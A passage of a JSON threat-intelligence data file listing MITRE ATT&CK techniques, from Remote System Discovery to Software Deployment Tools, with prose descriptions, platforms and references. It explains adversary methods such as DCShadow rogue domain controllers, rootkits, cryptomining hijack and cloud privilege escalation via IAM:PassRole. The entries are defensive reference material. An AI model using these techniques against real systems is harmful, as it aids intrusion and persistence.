"description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://app.tidalcyber.com/software/4ea12106-c0a1-4546-bb64-a1675d9f5dc7) or <code>net view</code> using [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc).\n\nAdversaries may also analyze data from local host files (ex: <code>C:\\Windows\\System32\\Drivers\\etc\\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://app.tidalcyber.com/software/45b51950-6190-4572-b1a2-7c69d865251e) cache entries) in order to discover the presence of remote systems in an environment.\n\nAdversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands on network devices to gather detailed information about systems within a network (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[CISA AR21-126A FIVEHANDS May 2021](https://app.tidalcyber.com/references/f98604dd-2881-4024-8e43-6f5f48c6c9fa)]</sup> \n",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "00a9a4d4-928d-4d95-be31-dfac6103991f",
|
||
"value": "Remote System Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.\n\nMobile devices may also be used to infect PCs with malware if connected via USB.<sup>[[Exploiting Smartphone USB ](https://app.tidalcyber.com/references/573796bd-4553-4ae1-884a-9af71b5de873)]</sup> This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables.<sup>[[Windows Malware Infecting Android](https://app.tidalcyber.com/references/3733386a-14bd-44a6-8241-a10660ba25d9)]</sup><sup>[[iPhone Charging Cable Hack](https://app.tidalcyber.com/references/b8bb0bc5-e131-47b5-8c42-48cd3dc25250)]</sup> For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled).",
|
||
"meta": {
|
||
"platforms": [
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "6a7ab25e-49ed-4cd3-b199-5d80b728b416",
|
||
"value": "Replication Through Removable Media"
|
||
},
|
||
{
|
||
"description": "Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. \n\nOne common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.<sup>[[Kaspersky Lazarus Under The Hood Blog 2017](https://app.tidalcyber.com/references/a1e1ab6a-8db0-4593-95ec-78784607dfa0)]</sup> Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.<sup>[[CloudSploit - Unused AWS Regions](https://app.tidalcyber.com/references/7c237b73-233f-4fe3-b4a6-ce523fd82853)]</sup> Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.<sup>[[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)]</sup><sup>[[Trend Micro Exposed Docker APIs](https://app.tidalcyber.com/references/24ae5092-42ea-4c83-bdf7-c0e5026d9559)]</sup>\n\nAdditionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.<sup>[[Trend Micro War of Crypto Miners](https://app.tidalcyber.com/references/1ba47efe-35f8-4d52-95c7-65cdc829c8e5)]</sup>\n\nAdversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://app.tidalcyber.com/technique/e6c14a7b-1fb8-4557-83e7-7f5b89717311) campaigns and/or to seed malicious torrents.<sup>[[GoBotKR](https://app.tidalcyber.com/references/7d70675c-5520-4c81-8880-912ce918c4b5)]</sup> Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.<sup>[[Sysdig Proxyjacking](https://app.tidalcyber.com/references/26562be2-cab6-5867-9a43-d8a59c663596)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Containers",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "d10c4a15-aeaa-4630-a7a3-3373c89a584f",
|
||
"value": "Resource Hijacking"
|
||
},
|
||
{
|
||
"description": "Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. <sup>[[DCShadow Blog](https://app.tidalcyber.com/references/37514816-b8b3-499f-842b-2d8cce9e140b)]</sup> Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.\n\nRegistering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. <sup>[[Adsecurity Mimikatz Guide](https://app.tidalcyber.com/references/b251ed65-a145-4053-9dc2-bf0dad83d76c)]</sup>\n\nThis technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). <sup>[[DCShadow Blog](https://app.tidalcyber.com/references/37514816-b8b3-499f-842b-2d8cce9e140b)]</sup> The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://app.tidalcyber.com/technique/dcb323f0-0fe6-4e26-9039-4f26f10cd3a5) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. <sup>[[DCShadow Blog](https://app.tidalcyber.com/references/37514816-b8b3-499f-842b-2d8cce9e140b)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "c5eb5b88-6c62-4900-9b14-c4d67d420002",
|
||
"value": "Rogue Domain Controller"
|
||
},
|
||
{
|
||
"description": "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. <sup>[[Symantec Windows Rootkits](https://app.tidalcyber.com/references/5b8d9094-dabf-4c29-a95b-b90dbcf07382)]</sup> \n\nRootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://app.tidalcyber.com/technique/4050dbda-5cb0-4bd6-8444-841e55611f3a). <sup>[[Wikipedia Rootkit](https://app.tidalcyber.com/references/7e877b6b-9873-48e2-b138-e02dcb5268ca)]</sup> Rootkits have been seen for Windows, Linux, and Mac OS X systems. <sup>[[CrowdStrike Linux Rootkit](https://app.tidalcyber.com/references/eb3590bf-ff12-4ccd-bf9d-cf8eacd82135)]</sup> <sup>[[BlackHat Mac OSX Rootkit](https://app.tidalcyber.com/references/e01a6d46-5b38-42df-bd46-3995d38bb60e)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "cf2b56f6-3ebd-48ec-b9d9-835397acef89",
|
||
"value": "Rootkit"
|
||
},
|
||
{
|
||
"description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.<sup>[[TechNet Task Scheduler Security](https://app.tidalcyber.com/references/3a6d08ba-d79d-46f7-917d-075a98c59228)]</sup>\n\nAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://app.tidalcyber.com/technique/4060ad55-7ff1-4127-acad-808b2bc77655), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.<sup>[[ProofPoint Serpent](https://app.tidalcyber.com/references/c2f7958b-f521-4133-9aeb-c5c8fae23e78)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Containers",
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "0baf02af-ffaa-403f-9f0d-da51f463a1d8",
|
||
"value": "Scheduled Task/Job"
|
||
},
|
||
{
|
||
"description": "Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.\n\nWhen scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://app.tidalcyber.com/technique/89203cae-d3f1-4eef-9b5a-29042eb05d19) or [Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88).",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "ea0557cd-94bc-48cf-9c3b-293c40986464",
|
||
"value": "Scheduled Transfer"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.<sup>[[CopyFromScreen .NET](https://app.tidalcyber.com/references/b9733af4-ffb4-416e-884e-d51649aecbce)]</sup><sup>[[Antiquated Mac Malware](https://app.tidalcyber.com/references/165edb01-2681-45a3-b76b-4eb7dee5dab9)]</sup>\n",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "4462ce9d-0a5a-427d-8160-7b307b50cfbd",
|
||
"value": "Screen Capture"
|
||
},
|
||
{
|
||
"description": "Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.<sup>[[D3Secutrity CTI Feeds](https://app.tidalcyber.com/references/088f2cbd-cce1-477f-9ffb-319477d74b69)]</sup> Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.<sup>[[ZDNET Selling Data](https://app.tidalcyber.com/references/61d00ae2-5494-4c6c-8860-6826e701ade8)]</sup>\n\nAdversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).",
|
||
"meta": {
|
||
"platforms": [
|
||
"PRE"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "40e4133b-28c2-4da7-9a6a-7392ae87f1da",
|
||
"value": "Search Closed Sources"
|
||
},
|
||
{
|
||
"description": "Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.<sup>[[WHOIS](https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)]</sup><sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup><sup>[[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)]</sup><sup>[[Medium SSL Cert](https://app.tidalcyber.com/references/6502425f-3435-4162-8c96-9e10a789d362)]</sup><sup>[[SSLShopper Lookup](https://app.tidalcyber.com/references/a8dc493f-2021-48fa-8f28-afd13756b789)]</sup><sup>[[DigitalShadows CDN](https://app.tidalcyber.com/references/183a070f-6c8c-46e3-915b-6edc58bb5e91)]</sup><sup>[[Shodan](https://app.tidalcyber.com/references/a142aceb-3ef5-4231-8771-bb3b2dae9acd)]</sup>\n\nAdversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).",
|
||
"meta": {
|
||
"platforms": [
|
||
"PRE"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "cf79ad1b-a82b-486b-88ad-e93bfc1c7439",
|
||
"value": "Search Open Technical Databases"
|
||
},
|
||
{
|
||
"description": "Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.<sup>[[Cyware Social Media](https://app.tidalcyber.com/references/e6136a63-81fe-4363-8d98-f7d1e85a0f2b)]</sup><sup>[[SecurityTrails Google Hacking](https://app.tidalcyber.com/references/3e7fdeaf-24a7-4cb5-8ed3-6057c9035303)]</sup><sup>[[ExploitDB GoogleHacking](https://app.tidalcyber.com/references/29714b88-a1ff-4684-a3b0-35c3a2c78947)]</sup>\n\nAdversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).",
|
||
"meta": {
|
||
"platforms": [
|
||
"PRE"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "f2d216e3-43d6-4a2e-aa5b-d6be78d018b6",
|
||
"value": "Search Open Websites/Domains"
|
||
},
|
||
{
|
||
"description": "Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://app.tidalcyber.com/technique/2eee984c-ea00-4284-b3eb-fd0c603a5a80)). These sites may also have details highlighting business operations and relationships.<sup>[[Comparitech Leak](https://app.tidalcyber.com/references/fa0eac56-45ea-4628-88cf-b843874b4a4d)]</sup>\n\nAdversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).",
|
||
"meta": {
|
||
"platforms": [
|
||
"PRE"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "c55c0462-d59f-4bd8-9728-05cf711917b0",
|
||
"value": "Search Victim-Owned Websites"
|
||
},
|
||
{
|
||
"description": "Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers. \n\nAdversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining malware (i.e. [Resource Hijacking](https://app.tidalcyber.com/technique/d10c4a15-aeaa-4630-a7a3-3373c89a584f)).<sup>[[Cado Security Denonia](https://app.tidalcyber.com/references/584e7ace-ef33-423b-9801-4728a447cb34)]</sup> Adversaries may also create functions that enable further compromise of the cloud environment. For example, an adversary may use the `IAM:PassRole` permission in AWS or the `iam.serviceAccounts.actAs` permission in Google Cloud to add [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1) to a serverless cloud function, which may then be able to perform actions the original user cannot.<sup>[[Rhino Security Labs AWS Privilege Escalation](https://app.tidalcyber.com/references/693e5783-4aa1-40ce-8080-cec01c3e7b59)]</sup><sup>[[Rhingo Security Labs GCP Privilege Escalation](https://app.tidalcyber.com/references/55373476-1cbe-49f5-aecb-69d60b336d38)]</sup>\n\nServerless functions can also be invoked in response to cloud events (i.e. [Event Triggered Execution](https://app.tidalcyber.com/technique/e1e42979-d3cd-461b-afc4-a6373cbf97ba)), potentially enabling persistent execution over time. For example, in AWS environments, an adversary may create a Lambda function that automatically adds [Additional Cloud Credentials](https://app.tidalcyber.com/technique/0799f2ee-3a83-452e-9fa9-83e91d83be25) to a user and a corresponding CloudWatch events rule that invokes that function whenever a new user is created.<sup>[[Backdooring an AWS account](https://app.tidalcyber.com/references/2c867527-1584-44f7-b5e5-8ca54ea79619)]</sup> Similarly, an adversary may create a Power Automate workflow in Office 365 environments that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.<sup>[[Varonis Power Automate Data Exfiltration](https://app.tidalcyber.com/references/16436468-1daf-433d-bb3b-f842119594b4)]</sup><sup>[[Microsoft DART Case Report 001](https://app.tidalcyber.com/references/bd8c6a86-1a63-49cd-a97f-3d119e4223d4)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS",
|
||
"Office 365",
|
||
"SaaS"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "d9edb609-2ca3-43d1-9c4d-c09a2856230f",
|
||
"value": "Serverless Execution"
|
||
},
|
||
{
|
||
"description": "Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.<sup>[[volexity_0day_sophos_FW](https://app.tidalcyber.com/references/85bee18e-216d-4ea6-b34e-b071e3f63382)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "03fb32fa-cdee-4e94-ae3e-16b51a10ba9c",
|
||
"value": "Server Software Component"
|
||
},
|
||
{
|
||
"description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup><sup>[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]</sup> \n\nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible <sup>[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]</sup>. In some cases, adversaries may stop or disable many or all services to render systems unusable.<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup> Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) or [Data Encrypted for Impact](https://app.tidalcyber.com/technique/f0c36d24-263c-4811-8784-f716c77ec6b3) on the data stores of services like Exchange and SQL Server.<sup>[[SecureWorks WannaCry Analysis](https://app.tidalcyber.com/references/522b2a19-1d15-48f8-8801-c64d3abd945a)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "e27c5756-f43e-424f-af62-b21e8b304e5d",
|
||
"value": "Service Stop"
|
||
},
|
||
{
|
||
"description": "Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560)).\n\nAdversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, adversaries can modularize functionality of their malware into shared objects that perform various functions such as managing C2 network communications or execution of specific actions on objective.\n\nThe Linux & macOS module loader can load and execute shared objects from arbitrary local paths. This functionality resides in `dlfcn.h` in functions such as `dlopen` and `dlsym`. Although macOS can execute `.so` files, common practice uses `.dylib` files.<sup>[[Apple Dev Dynamic Libraries](https://app.tidalcyber.com/references/39ffd162-4052-57ec-bd20-2fe6b8e6beab)]</sup><sup>[[Linux Shared Libraries](https://app.tidalcyber.com/references/054d769a-f88e-55e9-971a-f169ee434cfe)]</sup><sup>[[RotaJakiro 2021 netlab360 analysis](https://app.tidalcyber.com/references/7a9c53dd-2c0e-5452-9ee2-01531fbf8ba8)]</sup><sup>[[Unit42 OceanLotus 2017](https://app.tidalcyber.com/references/fcaf57f1-6696-54a5-a78c-255c8f6ac235)]</sup>\n\nThe Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in `NTDLL.dll` and is part of the Windows [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) which is called from functions like `LoadLibrary` at run time.<sup>[[Microsoft DLL](https://app.tidalcyber.com/references/f0ae2788-537c-5644-ba1b-d06a612e73c1)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "8941d1f4-d80c-4aaa-821a-a059c2a0f854",
|
||
"value": "Shared Modules"
|
||
},
|
||
{
|
||
"description": "Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management and software deployment applications may be used in an enterprise network or cloud environment for routine administration purposes. These systems may also be integrated into CI/CD pipelines. Examples of such solutions include: SCCM, HBSS, Altiris, AWS Systems Manager, Microsoft Intune, Azure Arc, and GCP Deployment Manager. \n\nAccess to network-wide or enterprise-wide endpoint management software may enable an adversary to achieve remote code execution on all connected systems. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.\n\nSaaS-based configuration management services may allow for broad [Cloud Administration Command](https://app.tidalcyber.com/technique/944a7b91-c58e-567d-9e2c-515b93713c50) on cloud-hosted instances, as well as the execution of arbitrary commands on on-premises endpoints. For example, Microsoft Configuration Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to Azure AD.<sup>[[SpecterOps Lateral Movement from Azure to On-Prem AD 2020](https://app.tidalcyber.com/references/eb97d3d6-21cb-5f27-9a78-1e8576acecdc)]</sup> Such services may also utilize [Web Protocols](https://app.tidalcyber.com/technique/9a21ec7b-9714-4073-9bf3-4df41995c698) to communicate back to adversary owned infrastructure.<sup>[[Mitiga Security Advisory: SSM Agent as Remote Access Trojan](https://app.tidalcyber.com/references/88fecbcd-a89b-536a-a1f6-6ddfb2b452da)]</sup>\n\nNetwork infrastructure devices may also have configuration management tools that can be similarly abused by adversaries.<sup>[[Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation](https://app.tidalcyber.com/references/a43dd8ce-23d6-5768-8522-6973dc45e1ac)]</sup>\n\nThe permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to access specific functionality.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "1bcf9fb5-6848-44d9-b394-ffbd3c357058",
|
||
"value": "Software Deployment Tools"
|
||
},
|
||
{
|
||
